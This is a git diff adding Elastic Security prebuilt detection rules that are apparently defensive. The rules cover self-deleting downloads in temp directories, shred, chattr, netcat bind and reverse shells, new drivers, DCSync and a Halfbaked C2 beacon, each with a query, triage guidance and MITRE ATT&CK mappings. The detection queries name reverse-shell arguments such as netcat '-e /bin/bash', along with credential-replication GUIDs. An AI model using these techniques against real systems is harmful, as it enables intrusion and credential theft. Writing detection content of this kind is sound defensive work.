https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc new file mode 100644 index 0000000000..62f7d32673 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc @@ -0,0 +1,72 @@ +[[prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory]] +=== File Creation, Execution and Self-Deletion in Suspicious Directory + +This rule monitors for the creation of a file, followed by its execution and self-deletion in a short timespan within a directory often used for malicious purposes by threat actors. This behavior is often used by malware to execute malicious code and delete itself to hide its tracks. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, user.id with maxspan=1m + [file where host.os.type == "linux" and event.action == "creation" and + process.name in ("curl", "wget", "fetch", "ftp", "sftp", "scp", "rsync", "ld") and + file.path : ("/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", + "/run/*", "/var/run/*", "/var/www/*", "/proc/*/fd/*")] by file.name + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] by process.name + [file where host.os.type == "linux" and event.action == "deletion" and not process.name in ("rm", "ld") and + file.path : ("/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", + "/run/*", "/var/run/*", "/var/www/*", "/proc/*/fd/*")] by file.name + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-deletion-via-shred.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-deletion-via-shred.asciidoc new file mode 100644 index 0000000000..41c9ff4872 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-deletion-via-shred.asciidoc @@ -0,0 +1,64 @@ +[[prebuilt-rule-8-10-5-file-deletion-via-shred]] +=== File Deletion via Shred + +Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:start and process.name:shred and +process.args:("-u" or "--remove" or "-z" or "--zero") and not process.parent.name:logrotate + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: File Deletion +** ID: T1070.004 +** Reference URL: https://attack.mitre.org/techniques/T1070/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-made-immutable-by-chattr.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-made-immutable-by-chattr.asciidoc new file mode 100644 index 0000000000..37a354daae --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-made-immutable-by-chattr.asciidoc @@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-file-made-immutable-by-chattr]] +=== File made Immutable by Chattr + +Detects a file being made immutable using the chattr binary. Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.). + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 33 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and user.name == "root" and + process.executable : "/usr/bin/chattr" and process.args : ("-*i*", "+*i*") and + not process.parent.executable: ("/lib/systemd/systemd", "/usr/local/uems_agent/bin/*", "/usr/lib/systemd/systemd") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ +* Sub-technique: +** Name: Linux and Mac File and Directory Permissions Modification +** ID: T1222.002 +** Reference URL: https://attack.mitre.org/techniques/T1222/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory.asciidoc new file mode 100644 index 0000000000..15ec766988 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory.asciidoc @@ -0,0 +1,62 @@ +[[prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory]] +=== File Permission Modification in Writable Directory + +Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 206 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:process and event.type:start and +process.name:(chmod or chown or chattr or chgrp) and +process.working_directory:("/tmp" or "/var/tmp" or "/dev/shm") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat.asciidoc new file mode 100644 index 0000000000..53e0a37fc1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat.asciidoc @@ -0,0 +1,133 @@ +[[prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat]] +=== File Transfer or Listener Established via Netcat + +A netcat process is engaging in network activity on a Linux host. Netcat is often used as a persistence mechanism by exporting a reverse shell or by serving a shell on a listening port. Netcat is also sometimes used for data exfiltration. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet +* https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf +* https://en.wikipedia.org/wiki/Netcat +* https://www.hackers-arise.com/hacking-fundamentals +* https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-netcat-swiss-army-knife-hacking-tools-0148657/ +* https://levelup.gitconnected.com/ethical-hacking-part-15-netcat-nc-and-netcat-f6a8f7df43fd + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Netcat Network Activity + +Netcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system. + +A reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing. + +A bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker. + +This rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection. + +#### Possible investigation steps + +- Examine the command line to identify if the command is suspicious. +- Extract and examine the target domain or IP address. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. + +### False positive analysis + +- Netcat is a dual-use tool that can be used for benign or malicious activity. It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Block the identified indicators of compromise (IoCs). +- Take actions to terminate processes and connections used by the attacker. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "linux" and event.type == "start" and + process.name:("nc","ncat","netcat","netcat.openbsd","netcat.traditional") and ( + /* bind shell to echo for command execution */ + (process.args:("-l","-p") and process.args:("-c","echo","$*")) + /* bind shell to specific port */ + or process.args:("-l","-p","-lp") + /* reverse shell to command-line interpreter used for command execution */ + or (process.args:("-e") and process.args:("/bin/bash","/bin/sh")) + /* file transfer via stdout */ + or process.args:(">","<") + /* file transfer via pipe */ + or (process.args:("|") and process.args:("nc","ncat")) + )] + [network where host.os.type == "linux" and (process.name == "nc" or process.name == "ncat" or process.name == "netcat" or + process.name == "netcat.openbsd" or process.name == "netcat.traditional")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-first-time-seen-driver-loaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-first-time-seen-driver-loaded.asciidoc new file mode 100644 index 0000000000..d959fe6a8c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-first-time-seen-driver-loaded.asciidoc @@ -0,0 +1,144 @@ +[[prebuilt-rule-8-10-5-first-time-seen-driver-loaded]] +=== First Time Seen Driver Loaded + +Identifies the load of a driver with an original file name and signature values that were observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Persistence +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating First Time Seen Driver Loaded + +A driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability. + +Attackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware. + +Read the complete research on "Stopping Vulnerable Driver Attacks" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks). + +This rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context: + - Identify the path that the driver was loaded from. If using Elastic Defend, this information can be found in the `dll.path` field. + - Examine the digital signature of the driver, and check if it's valid. + - Examine the creation and modification timestamps of the file: + - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `"dll.Ext.relative_file_name_modify_time"` fields, with the values being seconds. + - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation. + - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes. + - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Use Osquery to investigate the drivers loaded into the system. + - !{osquery{"label":"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \"Microsoft\" AND signed == \"1\")\n"}} + - !{osquery{"label":"Osquery - Retrieve All Unsigned Drivers with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \"0\"\n"}} +- Identify the driver's `Device Name` and `Service Name`. +- Check for alerts from the rules specified in the `Related Rules` section. + +### False positive analysis + +- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk. + +### Related Rules + +- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa +- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd +- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode) +- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed. + - This can be done via PowerShell `Remove-Service` cmdlet. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Ensure that the Driver Signature Enforcement is enabled on the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:"driver" and host.os.type:windows and event.action:"load" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync.asciidoc new file mode 100644 index 0000000000..9fcbb6569a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync.asciidoc @@ -0,0 +1,134 @@ +[[prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync]] +=== FirstTime Seen Account Performing DCSync + +This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. + +*Rule type*: new_terms + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html +* https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing +* https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml +* https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0027_windows_audit_directory_service_access.md +* https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync +* https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Privilege Escalation +* Use Case: Active Directory Monitoring +* Data Source: Active Directory +* Resources: Investigation Guide + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating FirstTime Seen Account Performing DCSync + +Active Directory replication is the process by which the changes that originate on one domain controller are automatically transferred to other domain controllers that store the same data. + +Active Directory data consists of objects that have properties, or attributes. Each object is an instance of an object class, and object classes and their respective attributes are defined in the Active Directory schema. Objects are defined by the values of their attributes, and changes to attribute values must be transferred from the domain controller on which they occur to every other domain controller that stores a replica of an affected object. + +Adversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys that are used legitimately for creating tickets, but also for forging tickets by attackers. This attack requires some extended privileges to succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. Privileged accounts can be abused to grant controlled objects the right to DCsync/Replicate. + +More details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync). + +This rule monitors for when a Windows Event ID 4662 (Operation was performed on an Active Directory object) with the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent Schema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set) is seen in the environment for the first time in the last 15 days. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account and system owners and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller (DC) that received the replication request. This will tell you where the AD replication request came from, and if it came from another DC or not. +- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones). + +### False positive analysis + +- Administrators may use custom accounts on Azure AD Connect; investigate if this is part of a new Azure AD account setup, and ensure it is properly secured. If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert. +- Although replicating Active Directory (AD) data to non-Domain Controllers is not a common practice and is generally not recommended from a security perspective, some software vendors may require it for their products to function correctly. Investigate if this is part of a new product setup, and ensure it is properly secured. If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If the entire domain or the `krbtgt` user was compromised: + - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user. +- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this information to determine ways the attacker could regain access to the environment. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.action:"Directory Service Access" and event.code:"4662" and + winlog.event_data.Properties:(*DS-Replication-Get-Changes* or *DS-Replication-Get-Changes-All* or + *DS-Replication-Get-Changes-In-Filtered-Set* or *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2* or + *1131f6aa-9c07-11d1-f79f-00c04fc2dcd2* or *89e95b76-444d-4c62-991a-0facbeda640c*) and + not winlog.event_data.SubjectUserName:(*$ or MSOL_*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: DCSync +** ID: T1003.006 +** Reference URL: https://attack.mitre.org/techniques/T1003/006/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon.asciidoc new file mode 100644 index 0000000000..dfa460d788 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon.asciidoc @@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon]] +=== Halfbaked Command and Control Beacon + +Halfbaked is a malware family used to establish persistence in a contested network. This rule detects a network activity algorithm leveraged by Halfbaked implant beacons for command and control. + +*Rule type*: query + +*Rule indices*: + +* packetbeat-* +* auditbeat-* +* filebeat-* +* logs-network_traffic.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html +* https://attack.mitre.org/software/S0151/ + +*Tags*: + +* Use Case: Threat Detection +* Tactic: Command and Control +* Domain: Endpoint + +*Version*: 104 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Threat intel + +This activity has been observed in FIN7 campaigns. +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +(event.dataset: (network_traffic.tls OR network_traffic.http) OR + (event.category: (network OR network_traffic) AND network.protocol: http)) AND + network.transport:tcp AND url.full:/http:\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}\/cd/ AND + destination.port:(53 OR 80 OR 8080 OR 443) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-high-number-of-process-terminations.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-high-number-of-process-terminations.asciidoc new file mode 100644 index 0000000000..2109ad833e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-high-number-of-process-terminations.asciidoc @@ -0,0 +1,103 @@ +[[prebuilt-rule-8-10-5-high-number-of-process-terminations]] +=== High Number of Process Terminations + +This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period. + +*Rule type*: threshold + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, 